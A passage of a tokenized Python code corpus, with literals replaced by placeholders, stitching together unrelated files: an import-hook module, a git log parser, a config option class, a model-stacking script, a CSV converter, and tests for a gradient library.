( module , '<STR_LIT>' , None ) <EOL> hooks = _post_import_hooks . get ( name , None ) <EOL> if hooks : <EOL> _post_import_hooks [ name ] = [ ] <EOL> for hook in hooks : <EOL> hook ( module ) <EOL> class _ImportHookLoader : <EOL> def load_module ( self , fullname ) : <EOL> module = sys . modules [ fullname ] <EOL> notify_module_loaded ( module ) <EOL> return module <EOL> class _ImportHookChainedLoader : <EOL> def __init__ ( self , loader ) : <EOL> self . loader = loader <EOL> def load_module ( self , fullname ) : <EOL> module = self . loader . load_module ( fullname ) <EOL> notify_module_loaded ( module ) <EOL> return module <EOL> class ImportHookFinder : <EOL> def __init__ ( self ) : <EOL> self . in_progress = { } <EOL> @ synchronized ( _post_import_hooks_lock ) <EOL> def find_module ( self , fullname , path = None ) : <EOL> if not fullname in _post_import_hooks : <EOL> return None <EOL> if fullname in self . in_progress : <EOL> return None <EOL> self . in_progress [ fullname ] = True <EOL> try : <EOL> if PY3 : <EOL> loader = importlib . find_loader ( fullname , path ) <EOL> if loader : <EOL> return _ImportHookChainedLoader ( loader ) <EOL> else : <EOL> __import__ ( fullname ) <EOL> return _ImportHookLoader ( ) <EOL> finally : <EOL> del self . in_progress [ fullname ] <EOL> def when_imported ( name ) : <EOL> def register ( hook ) : <EOL> register_post_import_hook ( hook , name ) <EOL> return hook <EOL> return register </s>
<s> import argparse <EOL> from pyg . Pygemony import Pygemony <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , required = True ) <EOL> parser . add_argument ( '<STR_LIT>' , required = True ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> args = vars ( args ) <EOL> pygemony = Pygemony ( args . get ( '<STR_LIT:username>' ) , <EOL> args . get ( '<STR_LIT>' ) , <EOL> args . get ( '<STR_LIT>' ) , <EOL> args . get ( '<STR_LIT>' ) ) <EOL> pygemony . run ( ) </s>
<s> from __future__ import absolute_import , print_function , unicode_literals , division <EOL> from sc2reader . factories . sc2factory import SC2Factory <EOL> from sc2reader . factories . sc2factory import FileCachedSC2Factory <EOL> from sc2reader . factories . sc2factory import DictCachedSC2Factory <EOL> from sc2reader . factories . sc2factory import DoubleCachedSC2Factory </s>
<s> import json <EOL> from nativeconfig . exceptions import DeserializationError , ValidationError , InitializationError <EOL> from nativeconfig . options . base_option import BaseOption <EOL> class ArrayOption ( BaseOption ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value_option = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( ) . __init__ ( name , setter = '<STR_LIT>' , getter = '<STR_LIT>' , ** kwargs ) <EOL> if value_option : <EOL> from nativeconfig . options . dict_option import DictOption <EOL> if isinstance ( value_option , BaseOption ) and not isinstance ( value_option , ArrayOption ) and not isinstance ( value_option , DictOption ) : <EOL> self . _value_option = value_option <EOL> else : <EOL> raise InitializationError ( "<STR_LIT>" ) <EOL> else : <EOL> self . _value_option = None <EOL> def serialize ( self , value ) : <EOL> if self . _value_option : <EOL> serializable_list = [ ] <EOL> for i in value : <EOL> serializable_list . append ( self . _value_option . serialize ( i ) ) <EOL> return serializable_list <EOL> else : <EOL> return value <EOL> def deserialize ( self , raw_value ) : <EOL> try : <EOL> if self . _value_option : <EOL> deserialized_list = [ ] <EOL> for i in raw_value : <EOL> deserialized_list . append ( self . _value_option . deserialize ( i ) ) <EOL> value = deserialized_list <EOL> else : <EOL> value = raw_value <EOL> except DeserializationError : <EOL> raise DeserializationError ( "<STR_LIT>" . format ( raw_value , self . name ) , raw_value , self . name ) <EOL> else : <EOL> return value <EOL> def serialize_json ( self , value ) : <EOL> if value is None : <EOL> return json . dumps ( None ) <EOL> elif self . _value_option : <EOL> return '<STR_LIT:[>' + '<STR_LIT:U+002CU+0020>' . join ( [ self . _value_option . serialize_json ( v ) for v in value ] ) + '<STR_LIT:]>' <EOL> else : <EOL> return json . dumps ( value ) <EOL> def deserialize_json ( self , json_value ) : <EOL> try : <EOL> value = json . loads ( json_value ) <EOL> except ValueError : <EOL> raise DeserializationError ( "<STR_LIT>" . format ( self . name , json_value ) , json_value , self . name ) <EOL> else : <EOL> if value is not None : <EOL> if not isinstance ( value , list ) : <EOL> raise DeserializationError ( "<STR_LIT>" . format ( json_value ) , json_value , self . name ) <EOL> else : <EOL> if self . _value_option : <EOL> return [ self . _value_option . deserialize_json ( json . dumps ( v ) ) for v in value ] <EOL> else : <EOL> return value <EOL> else : <EOL> return None <EOL> def validate ( self , value ) : <EOL> super ( ) . validate ( value ) <EOL> if not isinstance ( value , ( list , tuple ) ) : <EOL> raise ValidationError ( "<STR_LIT>" . format ( value , self . name ) , value , self . name ) </s>
<s> from datetime import datetime <EOL> import re <EOL> import math <EOL> import fnmatch <EOL> from functools import reduce <EOL> class GitLogParser : <EOL> COMMIT_REGEXP = r'<STR_LIT>' <EOL> AUTHOR_REGEXP = r'<STR_LIT>' <EOL> DATE_REGEXP = r'<STR_LIT>' <EOL> FILE_REGEXP = r'<STR_LIT>' <EOL> GIT_DATE_FORMAT = '<STR_LIT>' <EOL> def parse_stream ( self , input_stream , ignore = [ ] , encoding = '<STR_LIT:utf-8>' ) : <EOL> return self . parse ( input_stream . decode ( encoding ) , ignore = ignore ) <EOL> def parse ( self , input_string , ignore = [ ] ) : <EOL> commit_strings = input_string [ <NUM_LIT:7> : ] . split ( "<STR_LIT>" ) <EOL> commits = [ self . parse_commit ( commit , ignore = ignore ) for commit in commit_strings ] <EOL> return commits <EOL> def parse_commit ( self , commit_string , ignore = [ ] ) : <EOL> lines = commit_string . split ( "<STR_LIT:\n>" ) <EOL> commit = reduce ( ( lambda d , l : self . parse_line ( d , l , ignore = ignore ) ) , lines , { } ) <EOL> return commit <EOL> def parse_line ( self , commit_dict , line , ignore = [ ] ) : <EOL> attribute = self . try_fetch_attribute ( line , ignore = ignore ) <EOL> if attribute == None : <EOL> return commit_dict <EOL> if attribute [ <NUM_LIT:0> ] == '<STR_LIT:count>' : <EOL> commit_dict [ '<STR_LIT:count>' ] = commit_dict . get ( '<STR_LIT:count>' , <NUM_LIT:0> ) + attribute [ <NUM_LIT:1> ] <EOL> else : <EOL> commit_dict [ attribute [ <NUM_LIT:0> ] ] = attribute [ <NUM_LIT:1> ] <EOL> return commit_dict <EOL> def try_fetch_attribute ( self , commit_line , ignore = [ ] ) : <EOL> if re . match ( self . COMMIT_REGEXP , commit_line ) : <EOL> return ( '<STR_LIT>' , commit_line ) <EOL> elif re . match ( self . AUTHOR_REGEXP , commit_line ) : <EOL> return ( '<STR_LIT>' , re . match ( self . AUTHOR_REGEXP , commit_line ) . group ( <NUM_LIT:1> ) ) <EOL> elif re . match ( self . DATE_REGEXP , commit_line ) : <EOL> date_str = re . match ( self . DATE_REGEXP , commit_line ) . group ( <NUM_LIT:1> ) <EOL> return ( '<STR_LIT:date>' , datetime . strptime ( date_str , self . GIT_DATE_FORMAT ) ) <EOL> elif re . match ( self . FILE_REGEXP , commit_line ) : <EOL> filename = re . match ( self . FILE_REGEXP , commit_line ) . group ( <NUM_LIT:3> ) <EOL> for pattern in ignore : <EOL> if fnmatch . fnmatch ( filename , pattern ) : <EOL> return None <EOL> return ( '<STR_LIT:count>' , <NUM_LIT:1> ) <EOL> return None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pass </s>
<s> from itertools import izip <EOL> from math import log , exp <EOL> from datetime import datetime <EOL> from csv import DictReader <EOL> from itertools import izip <EOL> import argparse , random <EOL> from util import write_dump , read_dump <EOL> import numpy as np <EOL> from sklearn . metrics import log_loss <EOL> import xgboost as xgb <EOL> import theano <EOL> import lasagne <EOL> from lasagne import layers <EOL> from lasagne . objectives import Objective <EOL> from lasagne . layers import DenseLayer <EOL> from lasagne . layers import DropoutLayer <EOL> from lasagne . layers import InputLayer <EOL> from lasagne . nonlinearities import identity , sigmoid , tanh , rectify , linear <EOL> from lasagne . nonlinearities import softmax <EOL> from lasagne . updates import nesterov_momentum , adagrad <EOL> from nolearn . lasagne import NeuralNet <EOL> from nolearn . lasagne import BatchIterator <EOL> def get_nn_model ( shape ) : <EOL> np . random . seed ( <NUM_LIT:9> ) <EOL> model = NeuralNet ( <EOL> layers = [ <EOL> ( '<STR_LIT:input>' , layers . InputLayer ) , <EOL> ( '<STR_LIT>' , layers . DenseLayer ) , <EOL> ( '<STR_LIT>' , layers . DenseLayer ) , <EOL> ( '<STR_LIT>' , layers . DenseLayer ) , <EOL> ] , <EOL> input_shape = ( None , shape [ <NUM_LIT:1> ] ) , <EOL> hidden1_num_units = <NUM_LIT:16> , <EOL> hidden1_nonlinearity = sigmoid , <EOL> hidden2_num_units = <NUM_LIT:8> , <EOL> hidden2_nonlinearity = sigmoid , <EOL> output_nonlinearity = softmax , <EOL> output_num_units = <NUM_LIT:2> , <EOL> update = adagrad , <EOL> update_learning_rate = theano . shared ( np . float32 ( <NUM_LIT:0.1> ) ) , <EOL> on_epoch_finished = [ <EOL> ] , <EOL> use_label_encoder = False , <EOL> batch_iterator_train = BatchIterator ( batch_size = <NUM_LIT> ) , <EOL> regression = False , <EOL> max_epochs = <NUM_LIT> , <EOL> verbose = <NUM_LIT:1> , <EOL> eval_size = <NUM_LIT:0.0> , <EOL> ) <EOL> return model <EOL> def read_true ( ) : <EOL> with open ( "<STR_LIT>" ) as f : <EOL> for line in f : <EOL> y = int ( line [ <NUM_LIT:0> ] ) <EOL> yield y <EOL> def read_preds ( all_preds ) : <EOL> all_fh = [ ] <EOL> for pred in all_preds : <EOL> all_fh . append ( open ( pred ) ) <EOL> for preds in izip ( * all_fh ) : <EOL> yield map ( float , preds ) <EOL> def logloss ( p , y ) : <EOL> p = max ( min ( p , <NUM_LIT:1.> - <NUM_LIT> ) , <NUM_LIT> ) <EOL> return - log ( p ) if y == <NUM_LIT:1.> else - log ( <NUM_LIT:1.> - p ) <EOL> def logit ( x ) : <EOL> return <NUM_LIT:1.> / ( <NUM_LIT:1.> + exp ( x ) ) <EOL> def relogit ( x ) : <EOL> return log ( ( <NUM_LIT:1.> - x ) / max ( x , <NUM_LIT> ) ) <EOL> def stack_preds ( preds ) : <EOL> res = <NUM_LIT:1> <EOL> res2 = <NUM_LIT:0> <EOL> res3 = <NUM_LIT:0> <EOL> ratio = [ <NUM_LIT:1.0> / len ( preds ) for i in range ( len ( preds ) ) ] <EOL> for p , r in zip ( preds , ratio ) : <EOL> res *= p <EOL> res2 += p * r <EOL> res3 += relogit ( p ) <EOL> res = res ** ( <NUM_LIT:1.0> / len ( preds ) ) <EOL> res3 = logit ( res3 / len ( preds ) ) <EOL> return res2 <EOL> def read_sample ( path ) : <EOL> for t , row in enumerate ( DictReader ( open ( path ) ) ) : <EOL> yield int ( row [ "<STR_LIT>" ] ) <EOL> def get_train_data ( ) : <EOL> all_preds = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> tr_X , tr_y_true = [ ] , [ ] <EOL> tr_loss , te_loss = <NUM_LIT:0.0> , <NUM_LIT:0.0> <EOL> te_X , te_y_true = [ ] , [ ] <EOL> avg_ctr = <NUM_LIT:0> <EOL> loss = <NUM_LIT:0> <EOL> delta = <NUM_LIT:1> <EOL> now = datetime . now ( ) <EOL> random . seed ( <NUM_LIT:9> ) <EOL> for t , ( y , preds ) in enumerate ( izip ( read_true ( ) , read_preds ( all_preds ) ) ) : <EOL> avg_p = stack_preds ( preds ) <EOL> avg_ctr += avg_p <EOL> l = logloss ( avg_p , y ) <EOL> if t < <NUM_LIT> : <EOL> if "<STR_LIT>" in args . model : <EOL> preds = map ( lambda x : relogit ( x ) , preds ) <EOL> elif "<STR_LIT>" in args . model : <EOL> preds = map ( lambda x : relogit ( x ) + ( random . random ( ) - <NUM_LIT:0.5> ) / <NUM_LIT:10> , preds ) <EOL> elif "<STR_LIT>" in args . model : <EOL> preds = map ( lambda x : relogit ( x ) + ( random . random ( ) - <NUM_LIT:0.5> ) / <NUM_LIT:10> , preds ) <EOL> tr_X . append ( preds ) <EOL> tr_y_true . append ( y ) <EOL> tr_loss += l <EOL> else : <EOL> preds = map ( lambda x : relogit ( x ) , preds ) <EOL> te_X . append ( preds ) <EOL> te_y_true . append ( y ) <EOL> te_loss += l <EOL> loss += l <EOL> if t == delta : <EOL> print "<STR_LIT>" % ( t , datetime . now ( ) - now , loss / ( t + <NUM_LIT:1> ) ) <EOL> delta *= <NUM_LIT:2> <EOL> print loss / ( t + <NUM_LIT:1> ) , avg_ctr / ( t + <NUM_LIT:1> ) <EOL> print "<STR_LIT>" , len ( tr_X ) , tr_loss / len ( tr_X ) <EOL> if te_X : <EOL> print "<STR_LIT>" , len ( te_X ) , te_loss / len ( te_X ) <EOL> return tr_X , tr_y_true , te_X , te_y_true <EOL> def cv_method ( ) : <EOL> tr_X , tr_y_true , te_X , te_y_true = get_train_data ( ) <EOL> if "<STR_LIT>" in args . model : <EOL> tr_X = np . array ( tr_X ) . astype ( np . float32 ) <EOL> tr_y_true = np . array ( tr_y_true ) . astype ( np . int32 ) <EOL> model = get_nn_model ( tr_X . shape ) <EOL> model . fit ( tr_X , tr_y_true ) <EOL> write_dump ( "<STR_LIT>" % args . model , model ) <EOL> if te_X : <EOL> te_X = np . array ( te_X ) . astype ( np . float32 ) <EOL> preds = model . predict_proba ( te_X ) [ : , <NUM_LIT:1> ] <EOL> np . savetxt ( "<STR_LIT>" , preds ) <EOL> print log_loss ( te_y_true , preds ) <EOL> elif "<STR_LIT>" in args . model : <EOL> dtrain = xgb . DMatrix ( tr_X , label = tr_y_true ) <EOL> if args . predict == "<STR_LIT>" : <EOL> if te_X : <EOL> dtest = xgb . DMatrix ( te_X , label = te_y_true ) <EOL> param = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:0.1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:9> , <EOL> } <EOL> if te_X : <EOL> watchlist = [ ( dtrain , '<STR_LIT:train>' ) , ( dtest , "<STR_LIT>" ) ] <EOL> else : <EOL> watchlist = [ ( dtrain , '<STR_LIT:train>' ) , ] <EOL> num_round = <NUM_LIT> <EOL> bst = xgb . train ( param , dtrain , num_round , watchlist ) <EOL> bst . save_model ( "<STR_LIT>" % args . model ) <EOL> if te_X : <EOL> preds = bst . predict ( dtest ) <EOL> np . savetxt ( "<STR_LIT>" , preds ) <EOL> def stack_method ( ) : <EOL> if "<STR_LIT>" in args . model : <EOL> all_preds = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> else : <EOL> all_preds = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> delta = <NUM_LIT:1> <EOL> now = datetime . now ( ) <EOL> X = [ ] <EOL> true_y = [ ] <EOL> for t , preds in enumerate ( read_preds ( all_preds ) ) : <EOL> if "<STR_LIT>" in args . model or "<STR_LIT>" in args . model : <EOL> preds = map ( lambda x : relogit ( x ) , preds ) <EOL> X . append ( preds ) <EOL> true_y . append ( <NUM_LIT:0> ) <EOL> if t == delta : <EOL> print "<STR_LIT>" % ( t , datetime . now ( ) - now ) <EOL> delta *= <NUM_LIT:2> <EOL> if "<STR_LIT>" in args . model : <EOL> model = read_dump ( "<STR_LIT>" % args . model ) <EOL> X = np . array ( X ) . astype ( np . float32 ) <EOL> preds = model . predict_proba ( X ) [ : , <NUM_LIT:1> ] <EOL> elif "<STR_LIT>" in args . model : <EOL> dtrain = xgb . DMatrix ( np . array ( X ) , label = true_y ) <EOL> bst = xgb . Booster ( { '<STR_LIT>' : <NUM_LIT:9> } ) <EOL> bst . load_model ( "<STR_LIT>" % args . model ) <EOL> preds = bst . predict ( dtrain ) <EOL> elif args . model == "<STR_LIT>" : <EOL> X = np . array ( X ) . astype ( np . float32 ) <EOL> preds = np . mean ( X , <NUM_LIT:1> ) <EOL> with open ( "<STR_LIT>" % args . model , '<STR_LIT:w>' ) as outfile : <EOL> outfile . write ( '<STR_LIT>' ) <EOL> avg_p = <NUM_LIT:0> <EOL> cnt = <NUM_LIT:0> <EOL> for ID , p in izip ( read_sample ( "<STR_LIT>" ) , preds ) : <EOL> avg_p += p <EOL> cnt += <NUM_LIT:1> <EOL> outfile . write ( '<STR_LIT>' % ( ID , str ( p ) ) ) <EOL> print cnt , avg_p / cnt <EOL> def main ( ) : <EOL> if args . predict == "<STR_LIT>" : <EOL> ratio = <NUM_LIT:1.0> <EOL> with open ( args . output , '<STR_LIT:w>' ) as outfile : <EOL> outfile . write ( '<STR_LIT>' ) <EOL> avg_p = <NUM_LIT:0> <EOL> cnt = <NUM_LIT:0> <EOL> for ID , preds in izip ( read_sample ( "<STR_LIT>" ) , read_preds ( [ args . input ] ) ) : <EOL> preds [ <NUM_LIT:0> ] = min ( preds [ <NUM_LIT:0> ] * ratio , <NUM_LIT:1.0> ) <EOL> avg_p += preds [ <NUM_LIT:0> ] <EOL> cnt += <NUM_LIT:1> <EOL> outfile . write ( '<STR_LIT>' % ( ID , str ( preds [ <NUM_LIT:0> ] ) ) ) <EOL> print avg_p / cnt <EOL> elif args . predict == "<STR_LIT>" : <EOL> cv_method ( ) <EOL> elif args . predict == "<STR_LIT>" : <EOL> stack_method ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , type = str , default = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , type = str , default = None ) <EOL> parser . add_argument ( '<STR_LIT>' , type = str , default = None ) <EOL> parser . add_argument ( '<STR_LIT>' , type = str , default = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> main ( ) </s>
<s> import os , sys , string , json , csv <EOL> from collections import OrderedDict <EOL> def csv2mlvs ( csvfile , output_dir = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> response_dict = OrderedDict ( ) <EOL> print "<STR_LIT>" , csvfile , "<STR_LIT>" , output_dir , "<STR_LIT:.>" <EOL> csvhandle = csv . reader ( open ( csvfile , '<STR_LIT:rb>' ) , delimiter = '<STR_LIT:U+002C>' ) <EOL> rowindex = <NUM_LIT:0> <EOL> error_list = [ ] <EOL> try : <EOL> os . mkdir ( output_dir ) <EOL> print "<STR_LIT>" , output_dir , "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" , output_dir , "<STR_LIT>" <EOL> for row in csvhandle : <EOL> if rowindex == <NUM_LIT:0> : <EOL> column_headers = row <EOL> cleaned_headers = [ ] <EOL> for c in column_headers : <EOL> c = c . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> c = c . replace ( "<STR_LIT:(>" , "<STR_LIT>" ) <EOL> c = c . replace ( "<STR_LIT:)>" , "<STR_LIT>" ) <EOL> c = c . replace ( "<STR_LIT:$>" , "<STR_LIT:->" ) <EOL> c = c . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) <EOL> cleaned_headers . append ( c ) <EOL> else : <EOL> record = dict ( zip ( cleaned_headers , row ) ) <EOL> state_dir = os . path . join ( output_dir , record [ "<STR_LIT:state>" ] ) <EOL> try : <EOL> os . mkdir ( state_dir ) <EOL> print "<STR_LIT>" , state_dir , "<STR_LIT>" <EOL> except : <EOL> pass <EOL> lt_dir = os . path . join ( state_dir , record [ "<STR_LIT>" ] ) <EOL> try : <EOL> os . mkdir ( lt_dir ) <EOL> print "<STR_LIT>" , lt_dir , "<STR_LIT>" <EOL> except : <EOL> pass <EOL> fn = "<STR_LIT>" % ( record [ "<STR_LIT>" ] ) <EOL> fp = os . path . join ( lt_dir , fn ) <EOL> ofile = open ( fp , '<STR_LIT:w>' ) <EOL> ofile . writelines ( json . dumps ( record , indent = <NUM_LIT:4> ) ) <EOL> ofile . close ( ) <EOL> rowindex += <NUM_LIT:1> <EOL> if error_list : <EOL> response_dict [ '<STR_LIT>' ] = rowindex - <NUM_LIT:1> <EOL> response_dict [ '<STR_LIT>' ] = len ( error_list ) <EOL> response_dict [ '<STR_LIT>' ] = error_list <EOL> response_dict [ '<STR_LIT:code>' ] = <NUM_LIT> <EOL> response_dict [ '<STR_LIT:message>' ] = "<STR_LIT>" <EOL> else : <EOL> response_dict [ '<STR_LIT>' ] = rowindex - <NUM_LIT:1> <EOL> response_dict [ '<STR_LIT:code>' ] = <NUM_LIT:200> <EOL> response_dict [ '<STR_LIT:message>' ] = "<STR_LIT>" <EOL> return response_dict <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if len ( sys . argv ) != <NUM_LIT:3> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> csv_file = sys . argv [ <NUM_LIT:1> ] <EOL> output_dir = sys . argv [ <NUM_LIT:2> ] <EOL> result = csv2mlvs ( csv_file , output_dir ) <EOL> print json . dumps ( result , indent = <NUM_LIT:4> ) </s>
<s> from kcbo . utils import listify , dictify <EOL> import numpy as np <EOL> from collections import Iterable <EOL> from itertools import chain <EOL> class statistic ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , statistic_name = None , is_distribution = False , is_estimate = False , pairwise = False , individual = False , ** kwargs ) : <EOL> self . statistic_name = statistic_name <EOL> self . is_distribution = is_distribution <EOL> self . is_estimate = is_estimate <EOL> self . pairwise = pairwise <EOL> self . individual = individual <EOL> self . kwargs = kwargs <EOL> def __call__ ( self , f ) : <EOL> f . is_statistic = True <EOL> f . statistic_name = self . statistic_name <EOL> f . is_distribution = self . is_distribution <EOL> f . is_estimate = self . is_estimate <EOL> f . pairwise = self . pairwise <EOL> f . individual = self . individual <EOL> if self . is_estimate : <EOL> f . estimate_function = self . kwargs . get ( '<STR_LIT>' , np . mean ) <EOL> return f <EOL> class StatisticalTest ( object ) : <EOL> """<STR_LIT>""" <EOL> TYPE = '<STR_LIT>' <EOL> ALLOW_COMPLETED_KEYS = True <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . data = None <EOL> self . completed = [ ] <EOL> self . keys = None <EOL> self . groups = None <EOL> self . initialize_statistics ( ) <EOL> self . initialize_test ( * args , ** kwargs ) <EOL> def initialize_test ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def initialize_statistics ( self ) : <EOL> """<STR_LIT>""" <EOL> def is_statistic ( obj , f ) : <EOL> try : <EOL> obj . __getattribute__ ( f ) . is_statistic <EOL> return obj . __getattribute__ ( f ) . statistic_name , obj . __getattribute__ ( f ) <EOL> except : <EOL> return None <EOL> self . statistics = { } <EOL> for value in map ( lambda func : is_statistic ( self , func ) , dir ( self ) ) : <EOL> if value is not None : <EOL> self . statistics [ value [ <NUM_LIT:0> ] ] = value [ <NUM_LIT:1> ] <EOL> self . distributions = { <EOL> k : v for ( k , v ) in self . statistics . items ( ) if v . is_distribution } <EOL> map ( lambda s : setattr ( self , s , self . statistics [ s ] ) , self . statistics ) <EOL> def run_model ( self , * args , ** kwargs ) : <EOL> raise NotImplementedError ( ) <EOL> @ staticmethod <EOL> def compute_interval ( distribution , alpha ) : <EOL> alpha_lower , alpha_upper = ( alpha / <NUM_LIT> , <NUM_LIT:1> - alpha / <NUM_LIT> ) <EOL> return np . percentile ( distribution , <NUM_LIT:100> * alpha_lower ) , np . percentile ( distribution , <NUM_LIT:100> * alpha_upper ) <EOL> def compute_statistic ( self , keys = None , ** kwargs ) : <EOL> if keys is None : <EOL> keys = list ( chain ( self . keys , self . groups ) ) or [ ] <EOL> data = { } <EOL> for key in keys : <EOL> key_data = { } <EOL> if not self . complete_key ( key ) : <EOL> self . run_model ( key ) <EOL> if isinstance ( key , Iterable ) and not type ( key ) is str and key in self . keys : <EOL> applicable_statistics = { k : v for ( k , v ) in self . statistics . items ( ) if v . pairwise } <EOL> else : <EOL> applicable_statistics = { k : v for ( k , v ) in self . statistics . items ( ) if v . individual } <EOL> for name , statistic in applicable_statistics . items ( ) : <EOL> key_data [ name ] = statistic ( key ) <EOL> if statistic . is_distribution : <EOL> key_data [ "<STR_LIT>" % name ] = self . compute_interval ( key_data [ name ] , <NUM_LIT> ) <EOL> if statistic . is_estimate and statistic . is_distribution : <EOL> key_data [ "<STR_LIT>" % name ] = statistic . estimate_function ( key_data [ name ] ) <EOL> data [ key ] = key_data <EOL> return data <EOL> def generate_tables ( self , data ) : <EOL> raise NotImplementedError ( ) <EOL> def compute_statistics ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . compute_statistic ( * args , ** kwargs ) <EOL> def complete_key ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . completed : <EOL> self . completed . append ( key ) <EOL> def summary ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) </s>
<s> import numpy as np <EOL> import numpy . random as npr <EOL> from guppy import hpy <EOL> import sys <EOL> sys . path . append ( '<STR_LIT:..>' ) <EOL> import kayak <EOL> def check_NodeMemory ( ) : <EOL> np_A = npr . randn ( <NUM_LIT:5> , <NUM_LIT:6> ) <EOL> A = kayak . Parameter ( np_A ) <EOL> N = int ( <NUM_LIT> ) <EOL> h = hpy ( ) <EOL> h . setref ( ) <EOL> for i in xrange ( N ) : <EOL> A = kayak . Identity ( A ) <EOL> print "<STR_LIT>" <EOL> print h . heap ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> check_NodeMemory ( ) </s>
<s> import numpy as np <EOL> import numpy . random as npr <EOL> import kayak <EOL> from . import * <EOL> def test_scalar_value ( ) : <EOL> npr . seed ( <NUM_LIT:1> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> np_X = npr . randn ( ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X ) <EOL> assert close_float ( out . value , <NUM_LIT:1.0> - np . exp ( - np . abs ( np_X ) ) ) <EOL> def test_scalar_grad ( ) : <EOL> npr . seed ( <NUM_LIT:2> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> while True : <EOL> np_X = npr . randn ( ) <EOL> if np . abs ( np_X ) > <NUM_LIT:0.1> : <EOL> break <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X ) <EOL> assert kayak . util . checkgrad ( X , out ) < MAX_GRAD_DIFF <EOL> def test_scalar_value_2 ( ) : <EOL> npr . seed ( <NUM_LIT:3> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> np_X = npr . randn ( ) <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert close_float ( out . value , wt * ( <NUM_LIT:1.0> - np . exp ( - np . abs ( np_X ) ) ) ) <EOL> def test_scalar_grad_2 ( ) : <EOL> npr . seed ( <NUM_LIT:4> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> while True : <EOL> np_X = npr . randn ( ) <EOL> if np . abs ( np_X ) > <NUM_LIT:0.1> : <EOL> break <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert kayak . util . checkgrad ( X , out ) < MAX_GRAD_DIFF <EOL> def test_vector_value ( ) : <EOL> npr . seed ( <NUM_LIT:5> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> np_X = npr . randn ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert close_float ( out . value , wt * np . sum ( <NUM_LIT:1.0> - np . exp ( - np . abs ( np_X ) ) ) ) <EOL> def test_vector_grad ( ) : <EOL> npr . seed ( <NUM_LIT:6> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> while True : <EOL> np_X = npr . randn ( ) <EOL> if np . all ( np . abs ( np_X ) > <NUM_LIT:0.1> ) : <EOL> break <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert kayak . util . checkgrad ( X , out ) < MAX_GRAD_DIFF <EOL> def test_matrix_value ( ) : <EOL> npr . seed ( <NUM_LIT:7> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> np_X = npr . randn ( <NUM_LIT:10> , <NUM_LIT:20> ) <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert close_float ( out . value , wt * np . sum ( <NUM_LIT:1.0> - np . exp ( - np . abs ( np_X ) ) ) ) <EOL> def test_matrix_grad ( ) : <EOL> npr . seed ( <NUM_LIT:8> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> while True : 